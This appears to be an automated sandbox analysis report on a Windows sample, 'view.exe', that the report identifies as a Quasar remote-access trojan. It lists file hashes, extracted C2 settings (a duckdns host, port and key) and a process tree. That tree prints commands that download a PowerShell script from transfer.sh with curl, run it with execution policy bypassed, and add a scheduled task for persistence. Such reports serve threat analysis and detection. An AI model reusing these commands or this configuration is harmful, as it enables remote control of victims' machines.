Analysis
-
max time kernel
74s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
20/01/2023, 04:31
Static task
static1
Behavioral task
behavioral1
Sample
view.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
view.exe
Resource
win10v2004-20220812-en
General
-
Target
view.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
-
encryption_key
B0326395AC2D48856CAE22978A087DF5DCF5816D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Update
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/3740-145-0x000000000047E74E-mapping.dmp family_quasar behavioral2/memory/3740-147-0x0000000000340000-0x00000000003C4000-memory.dmp family_quasar -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce view.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" view.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 91 api.ipify.org 92 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3920 set thread context of 3740 3920 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3160 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3920 powershell.exe 3920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 3740 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3740 RegAsm.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4728 wrote to memory of 1404 4728 view.exe 79 PID 4728 wrote to memory of 1404 4728 view.exe 79 PID 1404 wrote to memory of 5072 1404 cmd.exe 81 PID 1404 wrote to memory of 5072 1404 cmd.exe 81 PID 5072 wrote to memory of 4408 5072 WScript.exe 84 PID 5072 wrote to memory of 4408 5072 WScript.exe 84 PID 4408 wrote to memory of 4328 4408 cmd.exe 86 PID 4408 wrote to memory of 4328 4408 cmd.exe 86 PID 4328 wrote to memory of 1140 4328 cmd.exe 87 PID 4328 wrote to memory of 1140 4328 cmd.exe 87 PID 5072 wrote to memory of 3524 5072 WScript.exe 93 PID 5072 wrote to memory of 3524 5072 WScript.exe 93 PID 3524 wrote to memory of 2248 3524 cmd.exe 95 PID 3524 wrote to memory of 2248 3524 cmd.exe 95 PID 2248 wrote to memory of 3920 2248 cmd.exe 96 PID 2248 wrote to memory of 3920 2248 cmd.exe 96 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3920 wrote to memory of 3740 3920 powershell.exe 97 PID 3740 wrote to memory of 3160 3740 RegAsm.exe 98 PID 3740 wrote to memory of 3160 3740 RegAsm.exe 98 PID 3740 wrote to memory of 3160 3740 RegAsm.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\view.exe"C:\Users\Admin\AppData\Local\Temp\view.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\SYSTEM32\cmd.execmd /c new.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\curl.execurl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps16⤵PID:1140
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:3160
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074
-
Filesize
5.1MB
MD5970aca768e68faa580f758a1a379686b
SHA16a93921485cbd83382eb5a47315b1f0a67bcf684
SHA2566c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
SHA51266dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f